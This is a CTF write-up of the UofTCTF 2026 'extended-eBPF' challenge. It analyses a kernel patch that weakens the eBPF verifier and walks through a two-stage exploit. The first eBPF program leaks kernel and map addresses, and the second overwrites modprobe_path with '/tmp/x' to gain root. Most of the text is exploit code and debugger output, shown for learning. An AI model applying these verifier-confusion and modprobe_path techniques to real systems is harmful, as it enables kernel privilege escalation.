Extended-eBPF Writeup UofTCTF 2026

Table of Contents


  1. Patch Analysis
  2. Exploit Plan
  3. Exploit Overview
  4. Conclusion

This write-up discusses the extended-eBPF challenge from UofTCTF 2026. It appears as a classic kernel pwn challenge with the following files:

bzImage
chall.patch
challenge.yml
initramfs.cpio.gz
start-qemu.sh
startup.args

Kernel version: 6.12.47

PATCH ANALYSIS

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 24ae8f33e5d7..e5641845ecc0 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -13030,7 +13030,7 @@ static int retrieve_ptr_limit(const struct bpf_reg_state *ptr_reg,
 static bool can_skip_alu_sanitation(const struct bpf_verifier_env *env,
 				    const struct bpf_insn *insn)
 {
-	return env->bypass_spec_v1 || BPF_SRC(insn->code) == BPF_K;
+	return true;
 }
 
 static int update_alu_sanitation_state(struct bpf_insn_aux_data *aux,
@@ -14108,7 +14108,7 @@ static bool is_safe_to_compute_dst_reg_range(struct bpf_insn *insn,
 	case BPF_LSH:
 	case BPF_RSH:
 	case BPF_ARSH:
-		return (src_is_const && src_reg->umax_value < insn_bitness);
+		return (src_reg->umax_value < insn_bitness);
 	default:
 		return false;
 	}

As we can see, the patch is very short. It removes two checks, which respectively:
Disable ALU sanitization: can_skip_alu_sanitation now always returns true regardless of the check's result, so the verifier no longer emits the runtime sanitization that would catch out-of-bounds pointer arithmetic.
Allow variable shifts: left shift, right shift, and arithmetic right shift are accepted even when the shift amount is not a constant, because the src_is_const check is removed.
What does the second part imply?
It implies that if we trick the verifier using a value stored inside a map, it will reason about the shift using the minimum possible value of the shift register (https://elixir.bootlin.com/linux/v6.12.47/source/kernel/bpf/verifier.c#L13956), while at runtime the real (larger) value is used.

normal eBPF:

r1 << 2 ✅
r1 << 1 ✅
r1 << r0 ❌

patched eBPF:

r1 << 2 ✅
r1 << 1 ✅
r1 << r0 ✅

Example of how to exploit the bug.

Verifier's view (it assumes the minimum shift amount, here 0):

  REG = 1
  1 << 0 = 1
  1 - 1 = 0

  REG == 0

Runtime (the map actually holds 1):

  REG = 1
  1 << 1 = 2
  2 - 1 = 1

  REG == 1

EXPLOIT PLAN

The exploit is divided into two eBPF programs. The first one leaks a heap pointer that points to itself: since it sits at a fixed offset, it lets us compute the address of our map, and it also leaks a kernel pointer from which we recover the kernel base address. The second program overwrites the modprobe_path variable, which ultimately lets us read the flag.

EXPLOIT OVERVIEW

First program: leak the map and a kernel address

int map_fd = create_map(); 
uint64_t value = 1;
update_map(map_fd, 0, &value, BPF_ANY);
value = 0xcafebabe;
update_map(map_fd, 1, &value, BPF_ANY);
value = 0xdeadbeef;
update_map(map_fd, 2, &value, BPF_ANY);

First of all, we create a map with 4 entries of type uint64_t, so each value is 8 bytes. Then we populate it: the value 1 at index 0, 0xcafebabe at index 1, and 0xdeadbeef at index 2. The value 1 at index 0 will turn out to be very useful later.
0xdeadbeef and 0xcafebabe, on the other hand, were added just to make the map easy to find during the exploit debugging phase.

Command used to locate the map:

gef> search-pattern 0x00000000cafebabe
[+] Searching for '\xbe\xba\xfe\xca\x00\x00\x00\x00' in whole memory
[+] In (0xffffa014c1400000-0xffffa014c2e00000 [rw-] (0x1a00000 bytes)
  0xffffa014c1cd0f00:    be ba fe ca 00 00 00 00  ef be ad de 00 00 00 00    | 

The functions create_map and update_map were copied from a blog, but what they do is simply create a union bpf_attr structure, populate fields such as max_entries, value_size, map_type, etc., and then perform the corresponding syscall.

Now we get to the interesting part: the first BPF program.


struct bpf_insn ops[] = {
    BPF_LD_MAP_FD(BPF_REG_1, map_fd), 
    BPF_MOV64_IMM(BPF_REG_2 , 0),     
    BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_2, -0x8), 
    BPF_MOV64_REG(BPF_REG_2 , BPF_REG_10), 
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -0x8),  
    BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), 
    BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 36), 
    BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0 , 0),    
    BPF_JMP_IMM(BPF_JGE, BPF_REG_6, 2, 34), 
    BPF_MOV64_IMM(BPF_REG_7, 1),  
    BPF_ALU64_REG(BPF_LSH, BPF_REG_7 , BPF_REG_6), 
    BPF_ALU64_IMM(BPF_SUB, BPF_REG_7, 1), 

As we can see, the initial part of the code prepares the registers and the environment in order to perform a map_lookup, so that we can read the values stored in the map.
To properly understand how this works, we first need to know that eBPF registers have specific roles: r0 stores the return value of the currently executed function, or the result of a helper call.
r1 to r5 are equivalent to argument registers in a calling convention.
r6 to r9 are callee-saved registers, typically used as temporary pointers.
r10 points to the eBPF stack. The eBPF stack is usually accessed using negative offsets.
So, as a first step, we set up:

r1 -> the map (loaded via BPF_LD_MAP_FD)
r2 -> pointer to the key, a stack slot that we set to 0

as we can see from https://elixir.bootlin.com/linux/v6.12.47/source/include/uapi/linux/bpf.h#L1849 :

 void *bpf_map_lookup_elem(struct bpf_map *map, const void *key)
 	Description
 		Perform a lookup in *map* for an entry associated to *key*.
 	Return
 		Map value associated to *key*, or **NULL** if no entry was
 		found.

The bpf_map_lookup_elem helper expects two parameters: a pointer to the map and a pointer to the key. In order to obtain these two pointers, we use the following trick:

save the frame pointer (r10) into r2
subtract 8 from r2 -> (frame pointer - 8), the stack slot where we stored the key

In this way we get r2 = &key, while r1 already holds the map from BPF_LD_MAP_FD, and we can then invoke:
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem)

At this point, we only need to exploit the vulnerability and go out of bounds.

  BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 36), 
  BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0 , 0),

  BPF_JMP_IMM(BPF_JGE, BPF_REG_6, 2, 34),
  BPF_MOV64_IMM(BPF_REG_7, 1), 
  BPF_ALU64_REG(BPF_LSH, BPF_REG_7 , BPF_REG_6),

  BPF_ALU64_IMM(BPF_SUB, BPF_REG_7, 1),  

The first instruction is a jump-if-equal: if r0 is NULL (the lookup failed), we jump 36 instructions forward, to the exit. Otherwise, we dereference the returned pointer and store the 8-byte map value in r6.
Then we jump if r6 is greater than or equal to 2: on the fallthrough path, the verifier narrows r6 to the range [0, 1].

  BPF_MOV64_IMM(BPF_REG_7, 1),  
  BPF_ALU64_REG(BPF_LSH, BPF_REG_7 , BPF_REG_6), 

These two operations are extremely important because they allow us to go out of bounds. Here is what happens:

r7 -> 1
r7 << r6

verifier:
1 << 0 ----> 1

runtime (exploit):
1 << 1 ----> 2

At this point, we just need to do:

  BPF_ALU64_IMM(BPF_SUB, BPF_REG_7, 1),

  BPF_MOV64_REG(BPF_REG_8,BPF_REG_7),
  BPF_MOV64_REG(BPF_REG_1,BPF_REG_0),

  BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, -0xf8), 
  BPF_ALU64_IMM(BPF_MUL, BPF_REG_7, -0x88),

  BPF_ALU64_REG(BPF_ADD, BPF_REG_0 , BPF_REG_8),
  BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_0, 0),
  BPF_ALU64_REG(BPF_ADD, BPF_REG_1 , BPF_REG_7),
  BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_1, 0),

verifier:
r7 = 1
1 - 1 = 0

runtime (exploit):
r7 = 2
2 - 1 = 1

Several mov instructions are executed because we need two leaks, so it is convenient to preserve the value of the “bugged” register in another register before consuming it.

Finally, a series of multiplications are performed, which will allow us to go out of bounds from the map.

verifier:
r7 = 0
0 * (-0xf8) ---> 0

runtime (exploit):
r7 = 1
1 * (-0xf8) ---> -0xf8

Why these magic values (0xf8, 0x88)?

0xffffa000c13ceef8 -> ptr my map 

gef> x/20gx 0xffffa000c13ceef8-0xf8
0xffffa000c13cee00:	0xffffffffab41d9a0	0x0000000000000000
0xffffa000c13cee10:	0x0000000400000002	0x0000000300000008
0xffffa000c13cee20:	0x0000000000000000	0x0000000100000000
0xffffa000c13cee30:	0x0000000000000000	0x00000000ffffffff
0xffffa000c13cee40:	0x0000000000000000	0x0000000000000000
0xffffa000c13cee50:	0x0000000000000000	0x0000000000000000
0xffffa000c13cee60:	0x0000000000000000	0x0000000000000000
0xffffa000c13cee70:	0xffffa000c13cee70	0xffffa000c13cee70
0xffffa000c13cee80:	0x0000000000000002	0x0000000000000001
0xffffa000c13cee90:	0x0000000000000000	0x0000000000000000

As we can see, we obtain both a kernel pointer (the map's ops pointer, which points into the kernel image) and a heap pointer that points to itself. The latter is extremely important for leaking the map's own address. These two values live in the struct bpf_map header that precedes the map values: https://elixir.bootlin.com/linux/v6.12.47/source/include/linux/bpf.h#L287
Finally, this portion of code dereferences r0 (which now points to the ops field) and stores the kernel pointer in r5, then dereferences r1 (which now points to the self-referencing heap pointer) and stores it in r6.

  BPF_MOV64_IMM(BPF_REG_0, 0),       
  BPF_LD_MAP_FD(BPF_REG_1, map_fd),
  BPF_MOV64_IMM(BPF_REG_2, 0x0), 
  BPF_STX_MEM(BPF_DW, BPF_REG_10 , BPF_REG_2, -0x8), 
  BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), 
  BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -0x8), 
  BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_5, -0x10), 
  BPF_MOV64_REG(BPF_REG_3, BPF_REG_10), 
  BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -0x10),

  BPF_MOV64_IMM(BPF_REG_4, BPF_ANY), 
  BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_update_elem), 

The last missing part of the first eBPF program that creates the leak is calling map_update_elem, setting all the correct parameters and values so that we can update the map with our leaked pointers. But which values do we need to set?

As always, the answer comes from Bootlin 🙂

 /* 
  long bpf_map_update_elem(struct bpf_map *map, const void *key, const void *value, u64 flags)
  	Description
  		Add or update the value of the entry associated to *key* in
  		*map* with *value*. *flags* is one of:
 
  		**BPF_NOEXIST**
  			The entry for *key* must not exist in the map.
  		**BPF_EXIST**
  			The entry for *key* must already exist in the map.
  		**BPF_ANY**
  			No condition on the existence of the entry for *key*.
 
  		Flag value **BPF_NOEXIST** cannot be used for maps of types
  		**BPF_MAP_TYPE_ARRAY** or **BPF_MAP_TYPE_PERCPU_ARRAY**  (all
  		elements always exist), the helper would return an error.
  	Return
  		0 on success, or a negative error in case of failure.
      */

So the registers must be set as follows:

  • r0 -> 0
  • r1 -> struct bpf_map *map
  • r2 -> const void *key
  • r3 -> void *value
  • r4 -> u64 flags

There is nothing particularly complicated in this portion of the code, except that we must reuse the previous trick: every time we want to store an element at index x, we save the value x on the stack and pass a pointer to that stack slot as the key argument. Finally, we call exit. At the end of this eBPF program, the map will have the following layout:

gef> x/20gx 0xffffa000c13ceef8
0xffffa000c13ceef8:	0xffffffffab41d9a0	0xffffa000c13cee70
0xffffa000c13cef08:	0x00000000deadbeef	0x0000000000000000

Back in userspace, we run lookup_map, save the leaked values, and compute the bases.

int prog_fd = create_prog(ops, sizeof(ops) / sizeof(struct bpf_insn));
uint64_t leak_kernel=0,leak_map=0;
int rc = lookup_map(map_fd, 0, &leak_kernel);
rc = lookup_map(map_fd, 1, &leak_map);


uint64_t kbase = leak_kernel -0x1d9a0;
uint64_t modprobe_path = kbase + 0x4be1e0;
uint64_t mymap = leak_map + 0x88;
uint64_t distance = modprobe_path - mymap;

printf("[*] kernel leak %lx: \n" , leak_kernel);
printf("[*] kernel base %lx \n\n" ,kbase);
printf("[*] map leak %lx \n" , leak_map);
printf("[*] map  %lx \n\n" , mymap);

printf("[*] distance  (modprobe_path - mymap) %lx \n" , distance);
printf("[*] modprobe_path %lx \n\n\n" ,modprobe_path);

Second program: overwrite modprobe_path

In this section we will analyze the second eBPF program that will allow us to overwrite the modprobe_path variable and read the flag.
Before analyzing the exploit itself, I think it’s useful to understand a few key concepts.
Difference Between Scalar and Pointer In eBPF, a register is not just a number — it also has a type that is symbolically tracked by the verifier. In this case, the types we care about are the following:

  • SCALAR_VALUE: A scalar value is simply a number without any address meaning. It can be: a value read from memory, the result of an arithmetic operation, a constant. Example: BPF_MOV64_IMM(BPF_REG_0, 5); What eBPF does is track a umin/umax range, representing the minimum and maximum possible value the scalar can assume.

  • PTR_(pointer_type): In eBPF, a pointer is not just a generic number. It is a register representing a memory address tracked by the verifier. There are many pointer types, for example: PTR_TO_MAP_VALUE → map value, PTR_TO_CTX → program context, PTR_TO_STACK → eBPF stack, etc.

struct bpf_insn ops2[] = {
    BPF_LD_MAP_FD(BPF_REG_1, map_fd),
    BPF_MOV64_IMM(BPF_REG_2 , 0), 
    BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_2, -0x8), 
    BPF_MOV64_REG(BPF_REG_2 , BPF_REG_10), 
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -0x8), 
    BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
    BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 14), 
    BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0 , 0),
    BPF_JMP_IMM(BPF_JGE, BPF_REG_6, 2, 12),
    BPF_MOV64_IMM(BPF_REG_7, 1), 
    BPF_ALU64_REG(BPF_LSH, BPF_REG_7 , BPF_REG_6),
    BPF_ALU64_IMM(BPF_SUB, BPF_REG_7, 1),  
    BPF_MOV64_REG(BPF_REG_8,BPF_REG_7),
    BPF_MOV64_REG(BPF_REG_1,BPF_REG_0),

This is the first part of the program, where I reused the setup phase and the creation of the corrupted value (verifier register = 0, real register = 1). If this is not clear, see the previous section about the initial map and kernel address leak.

    BPF_LD_IMM64(BPF_REG_6, 0x782f706d742f),
    BPF_LD_IMM64(BPF_REG_4, distance),  
    BPF_ALU64_REG(BPF_MUL, BPF_REG_4 , BPF_REG_7),
    BPF_ALU64_REG(BPF_ADD, BPF_REG_1 , BPF_REG_4),
    BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6 ,0),
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_JMP_IMM(BPF_JEQ, BPF_REG_0 , 0, 0),
    BPF_MOV64_IMM(BPF_REG_0 , 0x0),
    BPF_EXIT_INSN()
};

This is the code that overwrites modprobe_path. There is nothing particularly complex about it; the challenging part is satisfying the verifier by inserting the required values.
The first operation is a BPF_LD_IMM64 loading the value 0x782f706d742f. At first glance this looks like a random value, but it is actually the path "/tmp/x" encoded in little-endian. An important detail is that we must use BPF_LD_IMM64 for this load, because:

  • BPF_LD_IMM64 : loads a full 64-bit immediate value (occupies two instructions).
  • BPF_MOV64_IMM : loads a 32-bit immediate value (sign-extended to 64 bits).

Next, we load into r4 the offset: modprobe_path - map.
Then the “magic” that tricks the verifier happens: we multiply r4 (which contains modprobe_path - map) by the value in r7.

verifier:
r4 -> modprobe_path - map
r7 -> 0
result: r4 * r7 -> 0

runtime (exploit):
r4 -> modprobe_path - map
r7 -> 1
result: r4 * r7 -> r4

At this point we add the value of the map to r4 as follows:

verifier:
r4 -> 0
r1 -> map
result: r1 + r4 -> map

runtime (exploit):
r4 -> modprobe_path - map
r1 -> map
result: r1 + r4 -> modprobe_path

It is very important to use BPF_ALU64_REG and not BPF_ALU64_IMM: IMM is a compile-time constant, while REG is a runtime value, and this is what lets us trick the verifier.
The reason we initially load the difference modprobe_path - map into the register is that, after deceiving the verifier into believing the register is 0, we only need to add the map pointer back. At that point, performing a stx causes no issues for the verifier, because it believes we are still writing inside our own map value.
In reality, however, the pointer resolves to modprobe_path, allowing us to overwrite it while the verifier thinks we are writing inside a legitimate map value.

Full exploit

[image: screenshot of the solve]

Conclusion

Since this was my first eBPF challenge, I wasn’t able to solve it during the CTF. However, I found the challenge very interesting, and it motivated me to learn a lot more about eBPF. Thanks to Markx86 for the help :) Any kind of feedback or discussion about what I’ve written is more than welcome, feel free to reach out.

Ferro